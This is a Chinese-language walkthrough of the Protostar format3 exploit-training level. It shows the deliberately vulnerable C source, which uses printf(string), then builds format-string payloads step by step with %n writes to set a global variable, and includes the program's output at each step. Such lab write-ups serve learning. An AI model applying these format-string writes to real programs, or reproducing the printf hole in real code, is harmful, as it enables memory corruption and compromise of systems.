Protostar format3

About

This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.

This level is at /opt/protostar/bin/format3

Source code

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void printbuffer(char *string) {                 printf(string); } void vuln() {                 char buffer[512];                 fgets(buffer, sizeof(buffer), stdin);                 printbuffer(buffer);                 if(target == 0x01025544) {                                 printf("you have modified the target :)\n");                 } else {                                 printf("target is %08x :(\n", target);                 } } int main(int argc, char **argv) {                 vuln(); }

这题与上看上去是不是很像？具体看看有两个不同的地方：1、是printbuffer替换了printf；2、是target的值换为0x01025544

同理，按上一题的做法试试，修改%x的长度，结果是可以的，结果字符串太长，等到我都睡着了。。。

user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08%232x%232x%3333x%x%x%x%x%x%x%x%16926279x%n"' | ./format3 <...>                                                                                                                                                                                                                  bffff614 you have modified the target :)

很明显，这样的做法不是题目的本意。由于本人掌握知识有限，即使答案摆在眼前也搞不明白。。。直到，看了本书《***之道：漏洞发掘的艺术》才恍然大悟，如果有人看不懂解答的话也强烈推荐看看这本书！！

以下说明均以阅读过《***之道：漏洞发掘的艺术》相关章节为基础，至于原理性不做太多解释，有空再专门写一篇文章解释解释 。。。

这题的难点也就是通过%n来修改target的值，从上一题的解法可以掌握的是可以通过%nx来掌握不算大的长度，因此对0x01025544通过拆分来完成，具体做法如下：

user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%x."*12' | ./format3      0.bffff5e0.b7fd7ff4.0.0.bffff7e8.804849d.bffff5e0.200.b7fd8420.bffff624.80496f4. target is 00000000 :( user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$x%12$n"' | ./format3      bffff624 target is 00000014 :( user@protostar:/opt/protostar/bin$ python -c 'print 0x44-(0x14-0x8)' 56 user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"' | ./format3                                                                                                      bffff624 target is 00000044 :(

瞧，现在已经得到低字节已经是44了，接下来按同一个思路往下做就是了。

user@protostar:/opt/protostar/bin$ python -c 'print 0x55-0x44' 17 user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"+"%12$17x%13$n"' | ./format3                                                                                                      bffff624                    80496f4 target is 00005544 :( user@protostar:/opt/protostar/bin$ python -c 'print 0x102-0x55' 173 user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"+"%12$17x%13$n"+"%13$173x%14$n"' | ./format3                                                                                                      bffff624                    80496f4                                                                                                                                                                                                                                                                                                                                            80496f5 you have modified the target :)